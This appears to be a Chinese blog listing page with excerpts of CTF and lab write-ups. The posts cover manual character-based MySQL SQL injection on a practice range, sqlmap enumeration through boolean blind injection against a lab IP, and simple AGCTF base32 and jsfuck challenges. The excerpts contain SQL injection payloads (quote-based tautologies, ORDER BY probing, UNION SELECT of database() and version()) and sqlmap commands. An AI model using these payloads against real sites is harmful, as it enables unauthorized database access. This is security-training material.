- 博客(14)
- 收藏
- 关注
原创 SQL手工注入漏洞测试(MySQL数据库-字符型)
启动靶场 点击‘关于平台停机维护的通知’ 在id后加’%23 判断是否存在注入点,加’ and 1=1%23,存在注入点。 ’ order by 5%23 ’ order by 4%23,有四个字段。 id=1’ and 1=2 union select 1,2,3,4%23 id=1’ and 1=2 union select 1,database(),version(),4%23 id=1’ ...
2019-12-10 23:46:57 400
原创 墨者学院SQL注入漏洞测试(布尔盲注)
点击链接 点击下方‘关于平台停机维护的通知’ 打开kali中的sqlmap输入 sqlmap -u http://219.153.49.228:45316/new_list.php?id=1 --current-db 得到数据库名stormgroup sqlmap -u 219.153.49.228:45316/new_list.php?id=1 -D stormgroup --tables 获...
2019-12-06 21:42:50 267
原创 AGCTF
1.一个32岁学长的情书 将IFDUGVCGPN3TGX3BGIZV62TVON2F6ZRSGEZW4ZDTL4QX2base!32解码,得到FLAG.
2019-12-05 21:35:31 118
原创 AGCTF
AGCTFweb 1.百度一下,你就知道. 点击链接,修改IP地址。 将蓝色字体复制到控制台回车。 得到"AGCTF{what_the_jsfuck}"。 2.百度一下,你就知道. 方法同上。
2019-12-05 21:21:07 217
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人